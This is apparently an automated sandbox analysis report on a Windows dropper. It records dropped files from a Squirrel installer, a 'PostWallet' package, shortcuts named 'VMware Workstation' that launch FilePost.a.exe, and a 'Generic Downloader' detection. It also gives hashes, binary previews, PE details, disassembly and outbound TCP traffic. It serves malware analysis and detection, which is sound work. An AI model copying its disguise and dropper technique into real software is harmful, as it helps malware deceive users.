                                                  SHA1:1745FA80DF5D86E5F077914DED73F581B368ACCF
                                                  SHA-256:EC5EF035F0148CAACCC6A2A81657BA67612DC3E521646ED1F65F56712D77F03C
                                                  SHA-512:149C0EFC39E1FA4B43BE1642DF6D1B0954AF41F0A9AE992A2E55D7660248F265A90DD17268A33072A441BA59119EEC6D9B94607603F115BFF04F3E2F0CC82BD2
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+.nYJ.=YJ.=YJ.=M!.<HJ.=M!.<.J.=M!.<NJ.=90.<VJ.=90.<AJ.=90.<.J.=M!.<PJ.=YJ.=.J.==0.<.J.==0.<[J.==0.<XJ.==0w=XJ.==0.<XJ.=RichYJ.=................PE..L...8..e...........!... .............|....................................... ............@.........................0w.......Y..d...............................XI......p...........................(...@............................................text............................... ..`.rdata..Xr.......t..................@..@.data....N...p...0...R..............@....rsrc...............................@..@.reloc..XI.......J..................@..B........................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\PostWallet\packages\PostWallet-1.0.0-full.nupkg

                                                  Download File
                                                  Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                  Category:dropped
                                                  Size (bytes):5669931
                                                  Entropy (8bit):7.999965927440836
                                                  Encrypted:true
                                                  SSDEEP:98304:c0KviiPecd1Muk3g6WKv+808OAInI7hkeQpydfHH7V74mfRk6mttTGkZIfzP8wHM:Qv3Pecdiuk3g6WKK7ChUydfn7VsmJMDV
                                                  MD5:0F0E96F3DA3D605C7A73D88B2ECE8CD0
                                                  SHA1:4060A13252162CD46DAF3ED52E477A4BA8DE70C1
                                                  SHA-256:8D94AA447236A4CB95E69FE93CB94A8AFF388334BA493CC70DBC26D058350C6C
                                                  SHA-512:B5E6F27976A25B333FAD13ADAF2F571D08BCD14F2ADB5DA71A62893C259191CF6B51EE2876A95311A1196E2F43288BE9285A27B2F82D6980B58DA8B5289621D2
                                                  Malicious:false
                                                  Preview:PK..........gX................lib/PK..........gX................lib/net48/PK..........gXH.......0]......lib/net48/FilePost.a.exe.].|S...I.6B .[.Z. ..t....R..6.....?....?1A..(K...L..M7...6.2.P.W..-....[....f.j)X..=.._...?.%y..s.=..s.=...-...%CQ.......*.S.....(}.x....#.k-3.....y.......+..|.+..{_...;....-XroA...........5T...1n.....1.]..\.[.{.O^G.~...... .>..}.2...m.....s~.c...t..x.J../..-..,....*.g...V...LE.Y.f.).j.m.;H..K.HsE...63..UQ.8W.r.......oI=..../.$>.ZD......L.5...,J.CQ..^Qf^@........'.N.9...2..p...~....q[...P.uK.}%..E.C.}...O.+....0..F.,.....\.uK.\.F......_...;......../~....I.....[..(....[...j.dE...W.._....~.p.G.9.JF.C$..Z}....h...DYg.\U.<;.U..z.l.C.Z...&+...."^....^..0rO?U...o...D.R.^r....:.........]..K. .-...9..a......G.[e.u..M..z._k....Gr......A...0....?+..o.i.@.........p.9..<(..:h.......mAIc.J..O...(..f.E....9I C....S..(`4.+t.......f..MH......U...g..m...#J.:..e..'8r-..d3V.K.~$$.....3..k.0..+.5.s......@.u...rK.o.....V..<]X.....d......

                                                  C:\Users\user\AppData\Local\PostWallet\packages\RELEASES

                                                  Download File
                                                  Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                  File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):79
                                                  Entropy (8bit):4.9037382300235866
                                                  Encrypted:false
                                                  SSDEEP:3:mOQ8mzcGw0BgVPKWdHYhJxrGEtTn:m/zcGbB4FdgjGEdn
                                                  MD5:535A03DF0527BA001F69A849F2495975
                                                  SHA1:0E7B27A6FA9B14262C1C4BEB82E7367A12C03BC9
                                                  SHA-256:0EEE2ABD684BC67E6FA1026229B92F3B4C11168D8286200B2DE85AC196417929
                                                  SHA-512:8DC13CB44E032A5AF4E23393B26C50193DFC1C8FF4F90B0EEC915CA4867770A5A54170E52F6587189C2FB8FC10226BD008CF0F443E4507C8901C4983CBC74130
                                                  Malicious:false
                                                  Preview:.4060A13252162CD46DAF3ED52E477A4BA8DE70C1 PostWallet-1.0.0-full.nupkg 5669931

                                                  C:\Users\user\AppData\Local\PostWallet\packages\SquirrelTemp\tempa

                                                  Download File
                                                  Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                  File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):79
                                                  Entropy (8bit):4.9037382300235866
                                                  Encrypted:false
                                                  SSDEEP:3:mOQ8mzcGw0BgVPKWdHYhJxrGEtTn:m/zcGbB4FdgjGEdn
                                                  MD5:535A03DF0527BA001F69A849F2495975
                                                  SHA1:0E7B27A6FA9B14262C1C4BEB82E7367A12C03BC9
                                                  SHA-256:0EEE2ABD684BC67E6FA1026229B92F3B4C11168D8286200B2DE85AC196417929
                                                  SHA-512:8DC13CB44E032A5AF4E23393B26C50193DFC1C8FF4F90B0EEC915CA4867770A5A54170E52F6587189C2FB8FC10226BD008CF0F443E4507C8901C4983CBC74130
                                                  Malicious:false
                                                  Preview:.4060A13252162CD46DAF3ED52E477A4BA8DE70C1 PostWallet-1.0.0-full.nupkg 5669931

                                                  C:\Users\user\AppData\Local\SquirrelTemp\PostWallet-1.0.0-full.nupkg

                                                  Download File
                                                  Process:C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exe
                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                  Category:dropped
                                                  Size (bytes):5669931
                                                  Entropy (8bit):7.999965927440836
                                                  Encrypted:true
                                                  SSDEEP:98304:c0KviiPecd1Muk3g6WKv+808OAInI7hkeQpydfHH7V74mfRk6mttTGkZIfzP8wHM:Qv3Pecdiuk3g6WKK7ChUydfn7VsmJMDV
                                                  MD5:0F0E96F3DA3D605C7A73D88B2ECE8CD0
                                                  SHA1:4060A13252162CD46DAF3ED52E477A4BA8DE70C1
                                                  SHA-256:8D94AA447236A4CB95E69FE93CB94A8AFF388334BA493CC70DBC26D058350C6C
                                                  SHA-512:B5E6F27976A25B333FAD13ADAF2F571D08BCD14F2ADB5DA71A62893C259191CF6B51EE2876A95311A1196E2F43288BE9285A27B2F82D6980B58DA8B5289621D2
                                                  Malicious:false
                                                  Preview:PK..........gX................lib/PK..........gX................lib/net48/PK..........gXH.......0]......lib/net48/FilePost.a.exe.].|S...I.6B .[.Z. ..t....R..6.....?....?1A..(K...L..M7...6.2.P.W..-....[....f.j)X..=.._...?.%y..s.=..s.=...-...%CQ.......*.S.....(}.x....#.k-3.....y.......+..|.+..{_...;....-XroA...........5T...1n.....1.]..\.[.{.O^G.~...... .>..}.2...m.....s~.c...t..x.J../..-..,....*.g...V...LE.Y.f.).j.m.;H..K.HsE...63..UQ.8W.r.......oI=..../.$>.ZD......L.5...,J.CQ..^Qf^@........'.N.9...2..p...~....q[...P.uK.}%..E.C.}...O.+....0..F.,.....\.uK.\.F......_...;......../~....I.....[..(....[...j.dE...W.._....~.p.G.9.JF.C$..Z}....h...DYg.\U.<;.U..z.l.C.Z...&+...."^....^..0rO?U...o...D.R.^r....:.........]..K. .-...9..a......G.[e.u..M..z._k....Gr......A...0....?+..o.i.@.........p.9..<(..:h.......mAIc.J..O...(..f.E....9I C....S..(`4.+t.......f..MH......U...g..m...#J.:..e..'8r-..d3V.K.~$$.....3..k.0..+.5.s......@.u...rK.o.....V..<]X.....d......

                                                  C:\Users\user\AppData\Local\SquirrelTemp\RELEASES

                                                  Download File
                                                  Process:C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exe
                                                  File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):79
                                                  Entropy (8bit):4.9037382300235866
                                                  Encrypted:false
                                                  SSDEEP:3:mOQ8mzcGw0BgVPKWdHYhJxrGEtTn:m/zcGbB4FdgjGEdn
                                                  MD5:535A03DF0527BA001F69A849F2495975
                                                  SHA1:0E7B27A6FA9B14262C1C4BEB82E7367A12C03BC9
                                                  SHA-256:0EEE2ABD684BC67E6FA1026229B92F3B4C11168D8286200B2DE85AC196417929
                                                  SHA-512:8DC13CB44E032A5AF4E23393B26C50193DFC1C8FF4F90B0EEC915CA4867770A5A54170E52F6587189C2FB8FC10226BD008CF0F443E4507C8901C4983CBC74130
                                                  Malicious:false
                                                  Preview:.4060A13252162CD46DAF3ED52E477A4BA8DE70C1 PostWallet-1.0.0-full.nupkg 5669931

                                                  C:\Users\user\AppData\Local\SquirrelTemp\Squirrel-Install.log

                                                  Download File
                                                  Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (367), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):2367
                                                  Entropy (8bit):5.319977614154781
                                                  Encrypted:false
                                                  SSDEEP:48:T/tHhLf3rLmGXbrk4VVu4ziTu4z4P4kZ6QuLKuRKEP4kZ6QjNRnDo3Er:TlqQvebrd
                                                  MD5:FCB3871871D99241515791FEBC962309
                                                  SHA1:0DE7FD059524324D1DA766E2797A2A3445D2268D
                                                  SHA-256:94E366D9D5A842159F21ED1758E66C38E824BD6D64B13890732170DF6C788052
                                                  SHA-512:3E03684E161D78D2A73628EF79280CCED9FAD6B7F08D6E52F2C2008B40FB529F529C251FC5ED3B4CE3FA3801B6A66699064EEFC6BFC68E5825D4B3CA51EF7183
                                                  Malicious:false
                                                  Preview:.[07/03/24 10:47:19] info: Program: Starting Squirrel Updater: --install . --rerunningWithoutUAC..[07/03/24 10:47:19] info: Program: Starting install, writing to C:\Users\user\AppData\Local\SquirrelTemp..[07/03/24 10:47:19] info: Program: About to install to: C:\Users\user\AppData\Local\PostWallet..[07/03/24 10:47:20] info: CheckForUpdateImpl: Reading RELEASES file from C:\Users\user\AppData\Local\SquirrelTemp..[07/03/24 10:47:20] info: CheckForUpdateImpl: First run, starting from scratch..[07/03/24 10:47:20] info: ApplyReleasesImpl: Writing files to app directory: C:\Users\user\AppData\Local\PostWallet\app-1.0.0..[07/03/24 10:47:20] info: ApplyReleasesImpl: Squirrel Enabled Apps: []..[07/03/24 10:47:20] warn: ApplyReleasesImpl: No apps are marked as Squirrel-aware! Going to run them all..[07/03/24 10:47:20] info: ApplyReleasesImpl: About to create shortcuts for FilePost.a.exe, rootAppDir C:\Users\user\AppData\Local\PostWallet..[07/03/24 10:47:20] info: ApplyReleasesImpl:

                                                  C:\Users\user\AppData\Local\SquirrelTemp\Update.exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):1899520
                                                  Entropy (8bit):5.894883178349122
                                                  Encrypted:false
                                                  SSDEEP:24576:pWltPuAnUCiag6CKM2zCy9sQuOjj1VgZej6GeS4lNrCze5qhYp4t9m2:0t3UCiag6CKM2zCyZuOjJaxSS5qh
                                                  MD5:A560BAD9E373EA5223792D60BEDE2B13
                                                  SHA1:82A0DA9B52741D8994F28AD9ED6CBD3E6D3538FA
                                                  SHA-256:76359CD4B0349A83337B941332AD042C90351C2BB0A4628307740324C97984CC
                                                  SHA-512:58A1B4E1580273E1E5021DD2309B1841767D2A4BE76AB4A7D4FF11B53FA9DE068F6DA67BF0DCCFB19B4C91351387C0E6E200A2A864EC3FA737A1CB0970C8242C
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe, Author: Joe Security
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5.p_............................>.... ........@.. .......................`............@.....................................W.... .......................@....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................ .......H.......LU..............,.................................................{....*..{....*..{....*r.(......}......}......}....*....0..S........u......,G(.....{.....{....o....,/(.....{.....{....o....,.(.....{.....{....o....*.*..0..K....... .A. )UU.Z(.....{....o....X )UU.Z(.....{....o....X )UU.Z(.....{....o....X*..0...........r...p......%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....(....*....{....*..{....*

                                                  C:\Users\user\AppData\Local\Temp\.squirrel-lock-CAB1F1D4116D18BCC531A7BF44D3609DB185FAD9

                                                  Download File
                                                  Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                  File Type:ISO-8859 text, with CR line terminators
                                                  Category:dropped
                                                  Size (bytes):4
                                                  Entropy (8bit):2.0
                                                  Encrypted:false
                                                  SSDEEP:3:9:9
                                                  MD5:A7E0F8AC46398A7876D1E40DD52C2AAB
                                                  SHA1:B66922B4E6F09E23C072E4AFF49C67C3121DD5AF
                                                  SHA-256:05174BBF0D407087E45B12BAAE17117426852FF3A9E58D12A0EBB9A10B409743
                                                  SHA-512:E6B93215582F7F4F5E9292273A9466B5D0CC3A4EA7D77AE42854203755441DD5EDBEFB11FE8890CAE7783E41E2EDBF61EC7B03D7E5E9870A7821D4016B095F79
                                                  Malicious:false
                                                  Preview:....

                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc\VMware Workstation.lnk

                                                  Download File
                                                  Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                  File Type:MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has Working directory, Icon number=0, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
                                                  Category:dropped
                                                  Size (bytes):2144
                                                  Entropy (8bit):2.6875231559475488
                                                  Encrypted:false
                                                  SSDEEP:24:8DvaRHQJl+zqAP21q2O4Zfqqd5HAmqyA7ECtU:8uRHwl+zqAP0q2ZfqqrAjyA7EWU
                                                  MD5:DE72AC2E65EEEB469ABB3478E406A3E0
                                                  SHA1:63650F55594E26255B78FC40BDC400E631E2E023
                                                  SHA-256:412FAB2F1947C73DFE7B113A0C13D0949DFE23664F49996ABD1CB0029722E51C
                                                  SHA-512:CC570314877CAF50D55240EEE7C3EA7D795BD809F417A67AFE477583CDC71E80BA083FAFEB5CC5904DBB2CF3559AF61C31A837146CF849A65950D608DB4A4A2D
                                                  Malicious:false
                                                  Preview:L..................F.@......................................................S....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................a.l.f.o.n.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....P.1...........Local.<............................................L.o.c.a.l.....`.1...........PostWallet..F............................................P.o.s.t.W.a.l.l.e.t.....z.6...........F.i.l.e.P.o.s.t...a...e.x.e...N............................................F.i.l.e.P.o.s.t...a...e.x.e...,.....P.o.s.t.W.a.l.l.e.t.1.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.P.o.s.t.W.a.l.l.e.t.\.F.i.l.e.P.o.s.t...a...e.x.e.2.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.P.o.s.t.W.a.l.l.e.t.\.a.p.p.-.1...0...0.7.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.P.o.s.t.W.a.l.l.e.t.\.F.i.l.e.P.o.s.t...a

                                                  C:\Users\user\Desktop\VMware Workstation.lnk

                                                  Download File
                                                  Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                  File Type:MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has Working directory, Icon number=0, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
                                                  Category:dropped
                                                  Size (bytes):2130
                                                  Entropy (8bit):2.6865518206806787
                                                  Encrypted:false
                                                  SSDEEP:24:8DvaRHQJl+pqAP21q2O4Zfqqd5HAmqyA7ECtU:8uRHwl+pqAP0q2ZfqqrAjyA7EWU
                                                  MD5:08274D03823C1DB0BF257C6E1ECBAFEF
                                                  SHA1:7A7FEFCC30654A5AF2A3FC4EB6BACF6110E5B904
                                                  SHA-256:9FF427C6DAE1AFC2EF2C2A23B9E5D2482832C87C78A95CF80D497BEB88BBF29A
                                                  SHA-512:EA8F98F1CE09B95C33B2A900FF12C45B37498917AE8B03CAF59944F908C2FD524131616091AE596E7DFEF0B93D98FD4FF0F9379BFED72A6B9971D7D027B0EE7D
                                                  Malicious:false
                                                  Preview:L..................F.@......................................................S....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................a.l.f.o.n.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....P.1...........Local.<............................................L.o.c.a.l.....`.1...........PostWallet..F............................................P.o.s.t.W.a.l.l.e.t.....z.6...........F.i.l.e.P.o.s.t...a...e.x.e...N............................................F.i.l.e.P.o.s.t...a...e.x.e...,.....P.o.s.t.W.a.l.l.e.t.*.....\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.P.o.s.t.W.a.l.l.e.t.\.F.i.l.e.P.o.s.t...a...e.x.e.2.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.P.o.s.t.W.a.l.l.e.t.\.a.p.p.-.1...0...0.7.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.P.o.s.t.W.a.l.l.e.t.\.F.i.l.e.P.o.s.t...a...e.x.e......

                                                  Static File Info

                                                  General

                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Entropy (8bit):7.9945445565179565
                                                  TrID:
                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                  • DOS Executable Generic (2002/1) 0.02%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:00023948209303294#U00ac320302282349843984903.exe
                                                  File size:6'569'472 bytes
                                                  MD5:9e1e30202d950ce1f273eb2e8492f39b
                                                  SHA1:4d76edbdb6976aa2acbbe9c4264a6fc9176584ff
                                                  SHA256:ddef5168dd82c49304884fd4fb0720a865588dad07f1350ee2eba97cf15ee4c7
                                                  SHA512:25402db8233ae501a2c6a6646cb26414b90c6e996fb9b19702e08700a56c40550c01cae92332547ed58f821dd3a447613cc716f77542476bda13f9c9dab510d6
                                                  SSDEEP:196608:TrH3BZaqdwA8xEAQmoPOt20dr31XS658JTBPWb8QfiIq28O:Tr/DdAmAR3fdtS658JTBD/Z
                                                  TLSH:BF663321B794D035E0371A3369E875214C7F7EA1972064AB77C42B7E86300D68B7ABBD
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........X........................y.......................................................a...T.......T.Z.......2.....T.......Rich...

                                                  File Icon

                                                  Icon Hash:13170f6d2d6d6d33

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x40ab5c
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x5F70D7D7 [Sun Sep 27 18:20:07 2020 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:6
                                                  OS Version Minor:0
                                                  File Version Major:6
                                                  File Version Minor:0
                                                  Subsystem Version Major:6
                                                  Subsystem Version Minor:0
                                                  Import Hash:e6f4169f2a5c3a8f93171d9f593bd22a

                                                  Entrypoint Preview

                                                  Instruction
                                                  call 00007F40F86123ECh
                                                  jmp 00007F40F8611D0Fh
                                                  ret
                                                  push ebp
                                                  mov ebp, esp
                                                  push esi
                                                  push dword ptr [ebp+08h]
                                                  mov esi, ecx
                                                  call 00007F40F8611EEDh
                                                  mov dword ptr [esi], 0041F45Ch
                                                  mov eax, esi
                                                  pop esi
                                                  pop ebp
                                                  retn 0004h
                                                  and dword ptr [ecx+04h], 00000000h
                                                  mov eax, ecx
                                                  and dword ptr [ecx+08h], 00000000h
                                                  mov dword ptr [ecx+04h], 0041F464h
                                                  mov dword ptr [ecx], 0041F45Ch
                                                  ret
                                                  push ebp
                                                  mov ebp, esp
                                                  push esi
                                                  push dword ptr [ebp+08h]
                                                  mov esi, ecx
                                                  call 00007F40F8611EBAh
                                                  mov dword ptr [esi], 0041F478h
                                                  mov eax, esi
                                                  pop esi
                                                  pop ebp
                                                  retn 0004h
                                                  and dword ptr [ecx+04h], 00000000h
                                                  mov eax, ecx
                                                  and dword ptr [ecx+08h], 00000000h
                                                  mov dword ptr [ecx+04h], 0041F480h
                                                  mov dword ptr [ecx], 0041F478h
                                                  ret
                                                  push ebp
                                                  mov ebp, esp
                                                  push esi
                                                  mov esi, ecx
                                                  lea eax, dword ptr [esi+04h]
                                                  mov dword ptr [esi], 0041F43Ch
                                                  and dword ptr [eax], 00000000h
                                                  and dword ptr [eax+04h], 00000000h
                                                  push eax
                                                  mov eax, dword ptr [ebp+08h]
                                                  add eax, 04h
                                                  push eax
                                                  call 00007F40F86135FCh
                                                  pop ecx
                                                  pop ecx
                                                  mov eax, esi
                                                  pop esi
                                                  pop ebp
                                                  retn 0004h
                                                  lea eax, dword ptr [ecx+04h]
                                                  mov dword ptr [ecx], 0041F43Ch
                                                  push eax
                                                  call 00007F40F8613647h
                                                  pop ecx
                                                  ret
                                                  push ebp
                                                  mov ebp, esp
                                                  push esi
                                                  mov esi, ecx
                                                  lea eax, dword ptr [esi+04h]
                                                  mov dword ptr [esi], 0041F43Ch
                                                  push eax
                                                  call 00007F40F8613630h
                                                  test byte ptr [ebp+08h], 00000001h

                                                  Data Directories

                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x2932c0x50.rdata
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c0000x618fd0.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x6450000x190c.reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x277200x70.rdata
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1f3980x40.rdata
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x1f0000x1a4.rdata
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x28ef00xe0.rdata
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                  Sections

                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x10000x1d32b0x1d400723597f58d5674921108e642a8e1b5b4False0.5962540064102564data6.658318567238198IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rdata0x1f0000xacae0xae00fa1645fd03dda975b8bd67904b34af32False0.44526760057471265data4.948544868021258IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .data0x2a0000x18700xe00f8724007e5d2ce85c65b5408a736d005False0.21484375data3.016754020922221IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .rsrc0x2c0000x618fd00x619000ec7f9a989e7f06bc72b68f43d45b374eunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc0x6450000x190c0x1a00fca0dc86189b5b127d85095ebd6abd95False0.7630709134615384data6.514362877721557IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                  Resources

                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  DATA0x2c3400x616301Zip archive data, at least v2.0 to extract, compression method=deflateEnglishUnited States1.0003108978271484
                                                  FLAGS0x6426440xcdataEnglishUnited States1.6666666666666667
                                                  RT_ICON0x6426500x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.21774193548387097
                                                  RT_ICON0x6429380x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.11597472924187725
                                                  RT_ICON0x6431e00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.21774193548387097
                                                  RT_ICON0x6434c80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.11597472924187725
                                                  RT_STRING0x643d700x418dataEnglishUnited States0.3148854961832061
                                                  RT_STRING0x6441880x604dataEnglishUnited States0.21363636363636362
                                                  RT_STRING0x64478c0x152dataEnglishUnited States0.5591715976331361
                                                  RT_GROUP_ICON0x6448e00x22dataEnglishUnited States1.0588235294117647
                                                  RT_GROUP_ICON0x6449040x22dataEnglishUnited States1.088235294117647
                                                  RT_VERSION0x6449280x2c0dataEnglishUnited States0.4659090909090909
                                                  RT_MANIFEST0x644be80x3e7XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (939), with CRLF line terminatorsEnglishUnited States0.5145145145145145

                                                  Imports

                                                  DLLImport
                                                  KERNEL32.dllLoadResource, FindResourceW, lstrlenW, GetProcAddress, GetModuleHandleW, DeleteCriticalSection, GetTempPathW, GetLastError, GetTempFileNameW, MoveFileW, WaitForSingleObject, GetExitCodeProcess, CloseHandle, DeleteFileW, GetModuleFileNameW, GetCurrentProcess, LoadLibraryW, FreeLibrary, InitializeCriticalSectionEx, GetFileAttributesW, CreateFileW, SetFilePointer, ReadFile, VerSetConditionMask, GetCurrentDirectoryW, MultiByteToWideChar, LocalFileTimeToFileTime, WideCharToMultiByte, CreateDirectoryW, WriteFile, SetFileTime, FreeResource, SizeofResource, LockResource, CreateProcessW, GetSystemDirectoryW, SetDefaultDllDirectories, GetCurrentThreadId, DecodePointer, RaiseException, LeaveCriticalSection, EnterCriticalSection, lstrcmpiW, LoadLibraryExW, GetConsoleMode, GetConsoleCP, SystemTimeToFileTime, VerifyVersionInfoW, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsDebuggerPresent, OutputDebugStringW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, ExitProcess, GetModuleHandleExW, GetStdHandle, HeapFree, HeapAlloc, GetFileType, CompareStringW, LCMapStringW, HeapSize, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, GetProcessHeap, SetStdHandle, GetStringTypeW, GetFileSizeEx, SetFilePointerEx, FlushFileBuffers, WriteConsoleW
                                                  SHLWAPI.dllPathIsUNCW
                                                  COMCTL32.dllInitCommonControlsEx

                                                  Possible Origin

                                                  Language of compilation systemCountry where language is spokenMap
                                                  EnglishUnited States

                                                  Network Behavior

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Mar 7, 2024 10:47:27.905368090 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:27.905411959 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:27.905504942 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:27.916008949 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:27.916024923 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:28.917109013 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:28.917212963 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:28.998995066 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:28.999041080 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:28.999438047 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:29.003067017 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:29.006120920 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:29.052236080 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:29.375566006 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:29.375782967 CET443497053.5.232.137192.168.2.5
                                                  Mar 7, 2024 10:47:29.375914097 CET49705443192.168.2.53.5.232.137
                                                  Mar 7, 2024 10:47:29.375936031 CET443497053.5.232.137192.168.2.5
